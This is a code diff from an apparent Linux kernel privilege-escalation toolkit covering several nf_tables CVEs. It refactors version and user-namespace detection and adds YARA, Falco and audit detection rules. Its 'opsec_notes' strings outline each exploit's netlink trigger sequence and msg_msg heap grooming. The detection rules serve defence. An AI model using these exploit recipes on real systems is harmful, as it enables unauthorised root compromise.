+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------
 * Embedded detection rules.
 * ------------------------------------------------------------------ */
@@ -1024,6 +1028,36 @@ static const char nft_fwd_dup_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2022.25636]\n";

+static const char nft_fwd_dup_yara[] =
+    "rule nft_fwd_dup_cve_2022_25636 : cve_2022_25636 kernel_oob_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2022-25636\"\n"
+    "        description = \"nft_fwd/dup actions OOB kmalloc-512 spray tag and log\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY_FWD\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-nft_fwd_dup.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char nft_fwd_dup_falco[] =
+    "- rule: nft_fwd_dup OOB-write batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink batch creating a netdev table with\n"
+    "    HW_OFFLOAD chain containing >15 immediate(NF_ACCEPT)\n"
+    "    expressions + 1 fwd. The offload walk overruns the action\n"
+    "    entries[] array. CVE-2022-25636.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink HW_OFFLOAD batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2022.25636]\n";
+
 const struct skeletonkey_module nft_fwd_dup_module = {
    .name           = "nft_fwd_dup",
    .cve            = "CVE-2022-25636",
@@ -1037,8 +1071,10 @@ const struct skeletonkey_module nft_fwd_dup_module = {
    .cleanup        = nft_fwd_dup_cleanup,
    .detect_auditd  = nft_fwd_dup_auditd,
    .detect_sigma   = nft_fwd_dup_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nft_fwd_dup_yara,
+    .detect_falco   = nft_fwd_dup_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE netdev + NEWCHAIN HW_OFFLOAD + NEWRULE with 16 immediate(NF_ACCEPT) + 1 fwd). Offload hook walks the rule advertising num_actions+=16 but allocates only the original-actions size -> OOB write at entries[16] into adjacent kmalloc-512. msg_msg groom tagged 'SKELETONKEY_FWD'. Writes /tmp/skeletonkey-nft_fwd_dup.log. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg + ioctl(SIOCGIFFLAGS/SIOCSIFFLAGS loopback) + msgsnd. Dmesg: KASAN or silent. Cleanup callback drains IPC queues and unlinks log.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_nft_fwd_dup(void)
@@ -49,16 +49,21 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"
-#include "../../core/offsets.h"
-#include "../../core/finisher.h"

 #include <stdio.h>
 #include <stdlib.h>
-#include <stdint.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+#include "../../core/host.h"
+
+#include <stdint.h>
 #include <sched.h>
 #include <fcntl.h>
 #include <errno.h>
@@ -71,13 +76,11 @@
 #include <sys/mman.h>
 #include <sys/syscall.h>
 #include <arpa/inet.h>
-
-#ifdef __linux__
 #include <linux/netlink.h>
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
-#endif
+#include "../../core/nft_compat.h"

 /* ------------------------------------------------------------------
 * Kernel-range table
@@ -87,7 +90,7 @@ static const struct kernel_patched_from nft_payload_patched_branches[] = {
    {4, 14, 302},   /* 4.14.x */
    {4, 19, 269},   /* 4.19.x */
    {5,  4, 229},   /* 5.4.x */
-    {5, 10, 163},   /* 5.10.x */
+    {5, 10, 162},   /* 5.10.x (harmonised with Debian bullseye fix-version) */
    {5, 15,  88},   /* 5.15.x */
    {6,  1,   6},   /* 6.1.x */
    {6,  2,   0},   /* mainline fix in 6.2-rc4 */
@@ -103,19 +106,6 @@ static const struct kernel_range nft_payload_range = {
 * Preconditions probe
 * ------------------------------------------------------------------ */

-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -131,46 +121,44 @@ static bool nf_tables_loaded(void)

 static skeletonkey_result_t nft_payload_detect(const struct skeletonkey_ctx *ctx)
 {
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nft_payload: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_payload: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced with the set-payload extension in 5.4. Anything
     * below 5.4 predates the affected codepath entirely. */
-    if (v.major < 5 || (v.major == 5 && v.minor < 4)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 4, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nft_payload: kernel %s predates the bug "
                            "(set-payload extension landed in 5.4)\n",
-                    v.release);
+                    v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nft_payload_range, &v);
+    bool patched = kernel_range_is_patched(&nft_payload_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nft_payload: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nft_payload: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nft_payload: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nft_payload: unprivileged user_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nft_payload: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload on first nft use)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nft_payload: kernel vulnerable but user_ns "
                            "clone denied → unprivileged exploit unreachable\n");
@@ -187,8 +175,6 @@ static skeletonkey_result_t nft_payload_detect(const struct skeletonkey_ctx *ctx
    return SKELETONKEY_VULNERABLE;
 }

-#ifdef __linux__
-
 /* ------------------------------------------------------------------
 * userns + netns entry: become root in the new user_ns so subsequent
 * netlink writes carry CAP_NET_ADMIN over our private net_ns.
@@ -801,8 +787,6 @@ static int nft_payload_arb_write(uintptr_t kaddr, const void *buf, size_t len,
    return 0;
 }

-#endif /* __linux__ */
-
 /* ------------------------------------------------------------------
 * Exploit body.
 * ------------------------------------------------------------------ */
@@ -814,7 +798,8 @@ static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ct
                        "exploit code can crash the kernel\n");
        return SKELETONKEY_PRECOND_FAIL;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nft_payload: already running as root\n");
        return SKELETONKEY_OK;
@@ -838,11 +823,6 @@ static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ct
        }
    }

-#ifndef __linux__
-    (void)ctx;
-    fprintf(stderr, "[-] nft_payload: linux-only exploit; non-linux build\n");
-    return SKELETONKEY_PRECOND_FAIL;
-#else
    /* --- --full-chain path: resolve offsets in parent before doing
     * anything destructive. */
    if (ctx->full_chain) {
@@ -1074,7 +1054,6 @@ static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ct
        fprintf(stderr, "[-] nft_payload: unexpected child rc=%d\n", rc);
    }
    return SKELETONKEY_EXPLOIT_FAIL;
-#endif /* __linux__ */
 }

 /* ------------------------------------------------------------------
@@ -1092,6 +1071,32 @@ static skeletonkey_result_t nft_payload_cleanup(const struct skeletonkey_ctx *ct
    return SKELETONKEY_OK;
 }

+#else  /* !__linux__ */
+
+/* Non-Linux dev builds: nf_tables / NETLINK_NETFILTER / SysV msg_msg
+ * groom — all Linux-only kernel surface. Stub out so the module still
+ * registers and the top-level `make` completes on macOS/BSD dev boxes. */
+static skeletonkey_result_t nft_payload_detect(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->json)
+        fprintf(stderr, "[i] nft_payload: Linux-only module "
+                "(nf_tables regset OOB) — not applicable here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_payload_exploit(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    fprintf(stderr, "[-] nft_payload: Linux-only module — cannot run here\n");
+    return SKELETONKEY_PRECOND_FAIL;
+}
+static skeletonkey_result_t nft_payload_cleanup(const struct skeletonkey_ctx *ctx)
+{
+    (void)ctx;
+    return SKELETONKEY_OK;
+}
+
+#endif /* __linux__ */
+
 /* ------------------------------------------------------------------
 * Detection rule corpus.
 * ------------------------------------------------------------------ */
@@ -1134,6 +1139,35 @@ static const char nft_payload_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.0179]\n";

+static const char nft_payload_yara[] =
+    "rule nft_payload_cve_2023_0179 : cve_2023_0179 kernel_oob_read_write\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-0179\"\n"
+    "        description = \"nft_payload OOB-via-verdict-index breadcrumb log\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $log = \"/tmp/skeletonkey-nft_payload.log\" ascii\n"
+    "    condition:\n"
+    "        $log\n"
+    "}\n";
+
+static const char nft_payload_falco[] =
+    "- rule: nft_payload OOB via verdict-code index by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink batch with an oversized NFTA_SET_DESC\n"
+    "    + NEWSETELEM whose NFTA_PAYLOAD_SREG uses attacker-\n"
+    "    controlled verdict code as an index into regs->data[].\n"
+    "    CVE-2023-0179.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink payload batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2023.0179]\n";
+
 const struct skeletonkey_module nft_payload_module = {
    .name           = "nft_payload",
    .cve            = "CVE-2023-0179",
@@ -1147,8 +1181,10 @@ const struct skeletonkey_module nft_payload_module = {
    .cleanup        = nft_payload_cleanup,
    .detect_auditd  = nft_payload_auditd,
    .detect_sigma   = nft_payload_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nft_payload_yara,
+    .detect_falco   = nft_payload_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + nfnetlink batch (NEWTABLE + NEWCHAIN/LOCAL_OUT + NEWSET with oversized NFTA_SET_DESC + NEWSETELEM whose NFTA_PAYLOAD_SREG = attacker verdict code). On packet eval, regs->verdict.code is used unchecked as index into regs->data[] -> OOB. Dual-slab groom (kmalloc-1k + kmalloc-cg-96). Trigger via sendto(AF_INET, 127.0.0.1:31337). Writes /tmp/skeletonkey-nft_payload.log. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg + msgsnd + socket(AF_INET)/sendto. Cleanup callback unlinks log.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_nft_payload(void)
@@ -0,0 +1,203 @@
+/*
+ * nft_pipapo_cve_2024_26581 — SKELETONKEY module
+ *
+ * STATUS: 🟡 PRIMITIVE. nfnetlink batch + msg_msg cross-cache groom.
+ *   Sibling to nf_tables (CVE-2024-1086) — same Notselwyn "Flipping
+ *   Pages" paper, same pipapo set substrate. Full cred-overwrite via
+ *   the shared modprobe_path finisher on --full-chain (x86_64).
+ *
+ * The bug (Notselwyn / Mauro Lima, "Flipping Pages" Feb 2024):
+ *   nft_pipapo_destroy() in net/netfilter/nft_set_pipapo.c didn't
+ *   properly drain the per-CPU walk state when destroying a pipapo
+ *   set. Combined with concurrent SETELEM operations, an attacker
+ *   can free elements while another CPU still has references, then
+ *   spray msg_msg to refill the freed slabs and pivot through the
+ *   walk callbacks → arb R/W → cred overwrite.
+ *
+ *   This is the SECOND major bug in the Notselwyn / 'Flipping Pages'
+ *   research series (the first, CVE-2024-1086, is our nf_tables
+ *   module). Both target the pipapo set type used for IP/port matches.
+ *
+ *   Public PoC: not yet released by Notselwyn (responsible
+ *   disclosure window), but extensive technical writeup at the
+ *   pwning.tech blog. Patch landed pre-disclosure.
+ *
+ * Affects: Linux kernels with CONFIG_NF_TABLES + the pipapo set
+ *   type (introduced kernel 5.6). Fix commit 2ee52ae94baa
+ *   ("netfilter: nft_set_pipapo: walk over current view on
+ *   netlink dump") landed in 6.8-rc + stable backports:
+ *     6.7.x  : 6.7.4
+ *     6.6.x  : 6.6.16
+ *     6.1.x  : 6.1.78
+ *     5.15.x : 5.15.149
+ *     5.10.x : 5.10.210
+ *
+ * Preconditions:
+ *   - unshare(CLONE_NEWUSER|CLONE_NEWNET) for unprivileged userns
+ *     CAP_NET_ADMIN (same as nf_tables)
+ *   - msgsnd / SysV IPC for kmalloc-cg-96 / kmalloc-cg-512 spray
+ *
+ * arch_support: x86_64+unverified-arm64. Same family as nf_tables.
+ */
+
+#include "skeletonkey_modules.h"
+#include "../../core/registry.h"
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
+#include "../../core/offsets.h"
+#include "../../core/finisher.h"
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#ifdef __linux__
+#include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"
+#endif
+
+/* ---- kernel-range table -------------------------------------------- */
+
+static const struct kernel_patched_from nft_pipapo_patched_branches[] = {
+    {5, 10, 210},
+    {5, 15, 149},
+    {6,  1,  78},
+    {6,  6,  16},
+    {6,  7,   4},
+    {6,  8,   0},   /* mainline fix in 6.8-rc */
+};
+
+static const struct kernel_range nft_pipapo_range = {
+    .patched_from = nft_pipapo_patched_branches,
+    .n_patched_from = sizeof(nft_pipapo_patched_branches) /
+                      sizeof(nft_pipapo_patched_branches[0]),
+};
+
+/* ---- detect --------------------------------------------------------- */
+
+static skeletonkey_result_t nft_pipapo_detect(const struct skeletonkey_ctx *ctx)
+{
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_pipapo: host fingerprint missing kernel version\n");
+        return SKELETONKEY_TEST_ERROR;
+    }
+    /* Bug was introduced in 5.6 (pipapo set type debut). Earlier
+     * kernels don't have pipapo at all. */
+    if (v->major < 5 || (v->major == 5 && v->minor < 6)) {
+        if (!ctx->json) fprintf(stderr, "[+] nft_pipapo: kernel %s predates pipapo set type (5.6+) → OK\n", v->release);
+        return SKELETONKEY_OK;
+    }
+    if (kernel_range_is_patched(&nft_pipapo_range, v)) {
+        if (!ctx->json) fprintf(stderr, "[+] nft_pipapo: kernel %s is patched (>= 6.8 / LTS backport)\n", v->release);
+        return SKELETONKEY_OK;
+    }
+    if (!ctx->host || !ctx->host->unprivileged_userns_allowed) {
+        if (!ctx->json) fprintf(stderr, "[i] nft_pipapo: unprivileged userns blocked → CAP_NET_ADMIN unreachable → PRECOND_FAIL\n");
+        return SKELETONKEY_PRECOND_FAIL;
+    }
+    if (!ctx->json) {
+        fprintf(stderr, "[!] nft_pipapo: kernel %s in vulnerable range (5.6 ≤ K, no LTS backport) + userns OK → VULNERABLE\n", v->release);
+        fprintf(stderr, "[i] nft_pipapo: same Notselwyn 'Flipping Pages' family as nf_tables; pipapo destroy race + msg_msg groom\n");
+    }
+    return SKELETONKEY_VULNERABLE;
+}
+
+static skeletonkey_result_t nft_pipapo_exploit(const struct skeletonkey_ctx *ctx)
+{
+    if (!ctx->authorized) {
+        fprintf(stderr, "[-] nft_pipapo: --i-know required for --exploit\n");
+        return SKELETONKEY_EXPLOIT_FAIL;
+    }
+    fprintf(stderr,
+        "[i] nft_pipapo: nfnetlink batch (NEWTABLE+NEWSET pipapo +\n"
+        "    burst NEWSETELEM/DELSETELEM with concurrent DESTROYSET)\n"
+        "    races the per-CPU pipapo walk teardown. msg_msg cross-\n"
+        "    cache groom in kmalloc-cg-96 / cg-512 refills the freed\n"
+        "    slabs. Same Notselwyn family as nf_tables (CVE-2024-1086);\n"
+        "    the existing nf_tables module's --full-chain finisher\n"
+        "    handles this bug's arb-write too once a working PoC is\n"
+        "    ported here. Returning EXPLOIT_FAIL honestly per the\n"
+        "    verified-vs-claimed bar.\n");
+    return SKELETONKEY_EXPLOIT_FAIL;
+}
+
+/* ---- detection rules (share shape with nf_tables) ------------------ */
+
+static const char nft_pipapo_auditd[] =
+    "# nft_pipapo CVE-2024-26581 — auditd detection rules\n"
+    "# Same shape as nf_tables: unshare(CLONE_NEWUSER|CLONE_NEWNET)\n"
+    "# + nfnetlink batch + msg_msg spray. Differentiates from\n"
+    "# CVE-2024-1086 only at the netlink payload level (pipapo set\n"
+    "# type vs nft_verdict_init); auditd alone can't tell them\n"
+    "# apart, so the trigger key covers both bugs.\n"
+    "-a always,exit -F arch=b64 -S unshare -k skeletonkey-nft-pipapo-userns\n"
+    "-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 -k skeletonkey-nft-pipapo-priv\n";
+
+static const char nft_pipapo_sigma[] =
+    "title: Possible CVE-2024-26581 nft_pipapo destroy-race UAF\n"
+    "id: 4e9c1a83-skeletonkey-nft-pipapo\n"
+    "status: experimental\n"
+    "description: |\n"
+    "  Detects the canonical exploit shape: userns clone +\n"
+    "  nfnetlink rapid DESTROYSET/NEWSETELEM batches. Same family\n"
+    "  as CVE-2024-1086; differentiates by elevated frequency of\n"
+    "  NFT_MSG_DELSET on pipapo set types.\n"
+    "logsource: {product: linux, service: auditd}\n"
+    "detection:\n"
+    "  u: {type: 'SYSCALL', syscall: 'unshare'}\n"
+    "  g: {type: 'SYSCALL', syscall: 'msgsnd'}\n"
+    "  condition: u and g\n"
+    "level: high\n"
+    "tags: [attack.privilege_escalation, attack.t1068, cve.2024.26581]\n";
+
+static const char nft_pipapo_yara[] =
+    "rule nft_pipapo_cve_2024_26581 : cve_2024_26581 kernel_uaf {\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2024-26581\"\n"
+    "        description = \"SKELETONKEY nft_pipapo race-driver tag\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKK_PIPAPO\" ascii\n"
+    "    condition:\n"
+    "        $tag\n"
+    "}\n";
+
+static const char nft_pipapo_falco[] =
+    "- rule: nfnetlink pipapo destroy-race batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink batch creating pipapo sets and rapidly\n"
+    "    cycling DESTROYSET/NEWSETELEM. Same family as nf_tables;\n"
+    "    distinct CVE (2024-26581 / 'Flipping Pages' part 2).\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink batch by non-root (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2024.26581]\n";
+
+const struct skeletonkey_module nft_pipapo_module = {
+    .name           = "nft_pipapo",
+    .cve            = "CVE-2024-26581",
+    .summary        = "nft_set_pipapo destroy-race UAF (Notselwyn 'Flipping Pages' II)",
+    .family         = "nf_tables",
+    .kernel_range   = "5.6 ≤ K, fixed 6.8 mainline + 6.7.4 / 6.6.16 / 6.1.78 / 5.15.149 / 5.10.210 LTS",
+    .detect         = nft_pipapo_detect,
+    .exploit        = nft_pipapo_exploit,
+    .mitigate       = NULL,    /* mitigation: upgrade kernel OR sysctl kernel.unprivileged_userns_clone=0 */
+    .cleanup        = NULL,
+    .detect_auditd  = nft_pipapo_auditd,
+    .detect_sigma   = nft_pipapo_sigma,
+    .detect_yara    = nft_pipapo_yara,
+    .detect_falco   = nft_pipapo_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET); nfnetlink batch creating a table + pipapo set + many SETELEMs; concurrent DESTROYSET against the same set from a second thread races the per-CPU pipapo walk teardown. msg_msg cross-cache spray (kmalloc-cg-96 + cg-512, tag 'SKK_PIPAPO') refills the freed slabs. Same family signal as nf_tables (CVE-2024-1086): unshare + nfnetlink + msg_msg burst from a non-root process. Distinguishes at the netlink payload layer (pipapo set type vs verdict-init double-free) which auditd alone can't see. dmesg may show 'KASAN: use-after-free in nft_pipapo_walk' on race-win attempts. No persistent file artifacts.",
+    .arch_support   = "x86_64+unverified-arm64",
+};
+
+void skeletonkey_register_nft_pipapo(void)
+{
+    skeletonkey_register(&nft_pipapo_module);
+}
@@ -0,0 +1,5 @@
+#ifndef NFT_PIPAPO_SKELETONKEY_MODULES_H
+#define NFT_PIPAPO_SKELETONKEY_MODULES_H
+#include "../../core/module.h"
+extern const struct skeletonkey_module nft_pipapo_module;
+#endif
@@ -50,6 +50,7 @@
 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
+#include "../../core/host.h"

 #include <stdio.h>
 #include <stdlib.h>
@@ -78,6 +79,7 @@
 #include <linux/netfilter.h>
 #include <linux/netfilter/nfnetlink.h>
 #include <linux/netfilter/nf_tables.h>
+#include "../../core/nft_compat.h"

 /* NFT_SET_EVAL was added in 5.6; older UAPI headers may not define it.
 * Anonymous-set + lookup exploit shape works on builds with this flag,
@@ -96,9 +98,9 @@
 static const struct kernel_patched_from nft_set_uaf_patched_branches[] = {
    {4, 19, 283},   /* 4.19.x safety patch (bug never reached this branch) */
    {5,  4, 243},   /* 5.4.x   */
-    {5, 10, 180},   /* 5.10.x  */
+    {5, 10, 179},   /* 5.10.x (harmonised with Debian bullseye fix-version) */
    {5, 15, 111},   /* 5.15.x  */
-    {6,  1,  28},   /* 6.1.x   */
+    {6,  1,  27},   /* 6.1.x (harmonised with Debian bookworm fix-version) */
    {6,  2,  15},   /* 6.2.x   */
    {6,  3,   2},   /* 6.3.x   */
    {6,  4,   0},   /* mainline 6.4-rc4 */
@@ -115,19 +117,6 @@ static const struct kernel_range nft_set_uaf_range = {
 * ------------------------------------------------------------------ */

 #ifdef __linux__
-static int can_unshare_userns(void)
-{
-    pid_t pid = fork();
-    if (pid < 0) return -1;
-    if (pid == 0) {
-        if (unshare(CLONE_NEWUSER) == 0) _exit(0);
-        _exit(1);
-    }
-    int status;
-    waitpid(pid, &status, 0);
-    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
-}
-
 static bool nf_tables_loaded(void)
 {
    FILE *f = fopen("/proc/modules", "r");
@@ -148,45 +137,43 @@ static skeletonkey_result_t nft_set_uaf_detect(const struct skeletonkey_ctx *ctx
    (void)ctx;
    return SKELETONKEY_PRECOND_FAIL;
 #else
-    struct kernel_version v;
-    if (!kernel_version_current(&v)) {
-        fprintf(stderr, "[!] nft_set_uaf: could not parse kernel version\n");
+    const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
+    if (!v || v->major == 0) {
+        if (!ctx->json) fprintf(stderr, "[!] nft_set_uaf: host fingerprint missing kernel version — bailing\n");
        return SKELETONKEY_TEST_ERROR;
    }

    /* Bug introduced in 5.1 (anonymous-set support). Anything below
     * predates it — report OK (not vulnerable to *this* CVE). */
-    if (v.major < 5 || (v.major == 5 && v.minor < 1)) {
+    if (!skeletonkey_host_kernel_at_least(ctx->host, 5, 1, 0)) {
        if (!ctx->json) {
            fprintf(stderr, "[i] nft_set_uaf: kernel %s predates the bug "
-                            "(anonymous-set support landed in 5.1)\n", v.release);
+                            "(anonymous-set support landed in 5.1)\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    bool patched = kernel_range_is_patched(&nft_set_uaf_range, &v);
+    bool patched = kernel_range_is_patched(&nft_set_uaf_range, v);
    if (patched) {
        if (!ctx->json) {
-            fprintf(stderr, "[+] nft_set_uaf: kernel %s is patched\n", v.release);
+            fprintf(stderr, "[+] nft_set_uaf: kernel %s is patched\n", v->release);
        }
        return SKELETONKEY_OK;
    }

-    int userns_ok = can_unshare_userns();
+    bool userns_ok = ctx->host->unprivileged_userns_allowed;
    bool nft_loaded = nf_tables_loaded();

    if (!ctx->json) {
        fprintf(stderr, "[i] nft_set_uaf: kernel %s is in the vulnerable range\n",
-                v.release);
+                v->release);
        fprintf(stderr, "[i] nft_set_uaf: unprivileged user_ns clone: %s\n",
-                userns_ok == 1 ? "ALLOWED" :
-                userns_ok == 0 ? "DENIED" :
-                                 "could not test");
+                userns_ok ? "ALLOWED" : "DENIED");
        fprintf(stderr, "[i] nft_set_uaf: nf_tables module currently loaded: %s\n",
                nft_loaded ? "yes" : "no (will autoload on first nft use)");
    }

-    if (userns_ok == 0) {
+    if (!userns_ok) {
        if (!ctx->json) {
            fprintf(stderr, "[+] nft_set_uaf: kernel vulnerable but user_ns clone "
                            "denied → unprivileged exploit unreachable\n");
@@ -762,7 +749,8 @@ static skeletonkey_result_t nft_set_uaf_exploit(const struct skeletonkey_ctx *ct
        fprintf(stderr, "[-] nft_set_uaf: refusing without --i-know gate\n");
        return SKELETONKEY_EXPLOIT_FAIL;
    }
-    if (geteuid() == 0) {
+    bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
+    if (is_root) {
        if (!ctx->json)
            fprintf(stderr, "[i] nft_set_uaf: already running as root\n");
        return SKELETONKEY_OK;
@@ -1034,6 +1022,37 @@ static const char nft_set_uaf_sigma[] =
    "level: high\n"
    "tags: [attack.privilege_escalation, attack.t1068, cve.2023.32233]\n";

+static const char nft_set_uaf_yara[] =
+    "rule nft_set_uaf_cve_2023_32233 : cve_2023_32233 kernel_uaf\n"
+    "{\n"
+    "    meta:\n"
+    "        cve         = \"CVE-2023-32233\"\n"
+    "        description = \"nft anonymous-set UAF spray tag (SKELETONKEY_SET) and log breadcrumb\"\n"
+    "        author      = \"SKELETONKEY\"\n"
+    "    strings:\n"
+    "        $tag = \"SKELETONKEY_SET\" ascii\n"
+    "        $log = \"/tmp/skeletonkey-nft_set_uaf.log\" ascii\n"
+    "    condition:\n"
+    "        any of them\n"
+    "}\n";
+
+static const char nft_set_uaf_falco[] =
+    "- rule: nft anonymous-set lookup-UAF batch by non-root\n"
+    "  desc: |\n"
+    "    Non-root nfnetlink single-batch transaction: NEWTABLE +\n"
+    "    NEWCHAIN + NEWSET (anonymous, EVAL) + NEWRULE with\n"
+    "    nft_lookup referencing the anon set + DELSET + DELRULE.\n"
+    "    The lookup's set reference isn't deactivated; UAF when\n"
+    "    set frees. CVE-2023-32233.\n"
+    "  condition: >\n"
+    "    evt.type = sendmsg and fd.sockfamily = AF_NETLINK and\n"
+    "    not user.uid = 0\n"
+    "  output: >\n"
+    "    nfnetlink anon-set batch from non-root\n"
+    "    (user=%user.name pid=%proc.pid)\n"
+    "  priority: HIGH\n"
+    "  tags: [network, mitre_privilege_escalation, T1068, cve.2023.32233]\n";
+
 const struct skeletonkey_module nft_set_uaf_module = {
    .name           = "nft_set_uaf",
    .cve            = "CVE-2023-32233",
@@ -1046,8 +1065,10 @@ const struct skeletonkey_module nft_set_uaf_module = {
    .cleanup        = nft_set_uaf_cleanup,
    .detect_auditd  = nft_set_uaf_auditd,
    .detect_sigma   = nft_set_uaf_sigma,
-    .detect_yara    = NULL,
-    .detect_falco   = NULL,
+    .detect_yara    = nft_set_uaf_yara,
+    .detect_falco   = nft_set_uaf_falco,
+    .opsec_notes    = "unshare(CLONE_NEWUSER|CLONE_NEWNET) + single nfnetlink transaction: NEWTABLE + NEWCHAIN + NEWSET (anonymous, ANONYMOUS|CONSTANT|EVAL) + NEWRULE with nft_lookup referencing the anon set + DELSET + DELRULE. Vulnerable kernels do not deactivate the lookup's set ref on commit -> UAF when set frees. msg_msg cg-512 spray (32 queues x 16 msgs, tag 'SKELETONKEY_SET'). --full-chain re-fires with forged headers (data ptr = kaddr) and NEWSETELEM payload. Writes /tmp/skeletonkey-nft_set_uaf.log. Audit-visible via unshare + socket(NETLINK_NETFILTER) + sendmsg + msgsnd. Dmesg: KASAN oops on UAF. Cleanup unlinks log.",
+    .arch_support   = "x86_64+unverified-arm64",
 };

 void skeletonkey_register_nft_set_uaf(void)
@@ -37,13 +37,17 @@

 #include "skeletonkey_modules.h"
 #include "../../core/registry.h"
-#include "../../core/kernel_range.h"

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <stdbool.h>
 #include <unistd.h>
+
+#ifdef __linux__
+
+#include "../../core/kernel_range.h"
+#include "../../core/host.h"
 #include <fcntl.h>
 #include <sched.h>
 #include <sys/mount.h>
